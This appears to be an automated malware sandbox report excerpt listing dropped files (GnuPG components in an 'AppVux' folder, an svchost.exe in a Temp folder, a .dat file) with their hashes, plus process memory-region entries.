SHA256 45d80a39499a2dbfa3352169a7fb78492f7a253ca3ec6b0a6f61825b7c3a235d
SHA512 219fcc80b0362004ece4aeec22f93085166de6e8969b45c26f671412ff3b238c95e14f439a6efd8d06177fe790c781ddfd21e8a21a6100bfb8b08bd2e69d5973

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpgsm.exe

MD5 c1bb0e52c1e07b706804c5262207852a
SHA1 741d5972d06c09f7eb3c85dd573e302ff80d55e4
SHA256 e7d50bfc7ea031e4438b227e5f3c1c231aac831ccb709b08f6d4e3106d448b5e
SHA512 cd6d04bc70a77ee6299e2d7c0e832c1104fd16ffd0243e6bff36910850cccb17fca86a297369bb0cb7c19ef674adc2089aaac3fa173184ec1f93bbb123957295

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\dirmngr.exe

MD5 2e94c3258f7863b6bf4ea937aa12a144
SHA1 c5bf59d3b038f9bb9f7e05706e9e80f21ff3b022
SHA256 2cc38c48eb742a28a4562bc62c9dca7ef525a62164752135b45a4cff89064e6e
SHA512 0925f11504f6972ede8525d3f7050060034a785963772a8b0f8d38d9feba47c1f9f55dafc959eea1d1789d8a4fbe03639c3f44ae848aef971d1a51371ce1fe2b

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libassuan-0.dll

MD5 4f1849e84694314b868505c1dcc53747
SHA1 06b8274e2569b32b5f9cf36202952e70b2fb4b02
SHA256 f69073ed88c6e72ae3244ca310bb43892eb97a4ede9e20fa457e0d8fb72a3b24
SHA512 1956d6a9963b5eb712e7e61bccb3846677622838889b3de1820cc99f0b2aec81e3fba3456275f06be0b6a9ec573a502b38de7f0d32393447b385cad53c426d50

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gnupg.exe

MD5 e7a712a20275825b93d9b86464755870
SHA1 64bd04917a18d2faa75c46470461d550733aea61
SHA256 4e6f3f339ded64578816dfc3dc1d74ba198f7d698109c15ac658bb9891e2ea9e
SHA512 c1ef6aca74b674386521a54c435524cd1adfb70e5fb43fee48929ba1ff631f7e2cba2c773fc6976c72b7095c0e8c73e0766a3977f2cb8798560cbaada9cfcec3

C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\zlib1.dll

MD5 f191ee2ae39bd67d4cc12c3667634d42
SHA1 e37aac8dc0da948eab6f24bbcd8495790cf99fd6
SHA256 df230f50a409db9ee949b9fdb10d7c08de03b5e3a0f72e7feb2618e436e1967a
SHA512 9e8d4eb00225cb646a8f5cbd8a36d9994150dd1b16029d9e9c0cdf5158f71642a761c887dcf680517a164770429f37f04412448351d9247f9cf2d2da6694c7ab

C:\Config.Msi\e5ac807.rbs

MD5 ca4adf13d5bc7c3af0d84bc58a1bbe36
SHA1 aa1c69eb5f9300f9c9ffb8441db359f577ad7ae0
SHA256 ca322b1fbe8346a514a9583c6c9fb93c7231565990ff51e55fede78d303bdf70
SHA512 7dff8de500fda6c5e27ffd4098bcd6d487048c9ab5d68fc0bf1111dd2cdc64a570d3b50d059207596dae45f42492ecef79b44963040611b52cf4e5170befed65

memory/1604-658-0x0000000000820000-0x0000000000845000-memory.dmp

memory/4288-659-0x0000000000C60000-0x0000000000C88000-memory.dmp

memory/1604-660-0x0000000000400000-0x000000000053E000-memory.dmp

memory/4288-661-0x0000000000C60000-0x0000000000C88000-memory.dmp

memory/1604-662-0x0000000065A80000-0x0000000065AAA000-memory.dmp

memory/1604-665-0x0000000063080000-0x00000000630A9000-memory.dmp

memory/1604-667-0x0000000066580000-0x00000000666AA000-memory.dmp

memory/4288-664-0x0000000000C60000-0x0000000000C88000-memory.dmp

memory/1604-663-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/4288-666-0x0000000000C60000-0x0000000000C88000-memory.dmp

memory/1640-681-0x00007FF85C460000-0x00007FF85CE4C000-memory.dmp

memory/1640-682-0x000002349E200000-0x000002349E210000-memory.dmp

memory/1640-683-0x000002349E200000-0x000002349E210000-memory.dmp

memory/1640-684-0x000002349E210000-0x000002349E232000-memory.dmp

memory/1640-692-0x000002349E3C0000-0x000002349E436000-memory.dmp

memory/1640-710-0x000002349E200000-0x000002349E210000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\WasSdrvbcfQkEjM\svchost.exe

MD5 a9c5924063a253f64fb86bc924be6996
SHA1 c39ba1e011318b3edf295d4bdde3d56b5de89972
SHA256 eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4
SHA512 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e

memory/1640-734-0x000002349E200000-0x000002349E210000-memory.dmp

memory/4288-743-0x0000000000C60000-0x0000000000C88000-memory.dmp

memory/4288-744-0x0000000000120000-0x0000000000220000-memory.dmp

memory/4288-745-0x00000000054B0000-0x0000000005538000-memory.dmp

memory/4288-746-0x0000000006610000-0x0000000006A10000-memory.dmp

memory/4288-748-0x0000000006610000-0x0000000006A10000-memory.dmp

memory/4288-749-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp

memory/4288-750-0x0000000006610000-0x0000000006A10000-memory.dmp

memory/4288-752-0x00000000744F0000-0x00000000746B2000-memory.dmp

memory/3040-753-0x0000000002780000-0x0000000002789000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kyV4XPwc2QRqDcs..dat

MD5 f0f942c7faac4695ff0e7002a21a12a6
SHA1 f9f1c24d6494aabe71b1d18da68cb2fbf77d4add
SHA256 eb203f4ad6ae7bab5e9608b3fd3e1d2e014393b9131dd46bb09640a299ef1006
SHA512 5b18e7f41e00f622aad2b176011cf5498f7f7fdd4a5c93f95b3502bb060c9a3d62548640d93e3d8a9043bcb63aa68e420b5c468480d0894baff1802e460a9ac7

memory/3040-757-0x00000000044E0000-0x00000000048E0000-memory.dmp

memory/3040-759-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp

memory/3040-761-0x00000000044E0000-0x00000000048E0000-memory.dmp

memory/1640-758-0x00007FF85C460000-0x00007FF85CE4C000-memory.dmp

memory/3040-763-0x00000000744F0000-0x00000000746B2000-memory.dmp

memory/1640-764-0x000002349E200000-0x000002349E210000-memory.dmp

memory/3040-762-0x00007FF87D4A0000-0x00007FF87D67B000-memory.dmp

memory/3040-765-0x00000000044E0000-0x00000000048E0000-memory.dmp

memory/3040-766-0x00000000044E0000-0x00000000048E0000-memory.dmp

memory/4288-771-0x00000000054B0000-0x0000000005538000-memory.dmp

memory/4288-772-0x0000000006610000-0x0000000006A10000-memory.dmp

memory/1640-773-0x000002349E200000-0x000002349E210000-memory.dmp

memory/1640-783-0x000002349E200000-0x000002349E210000-memory.dmp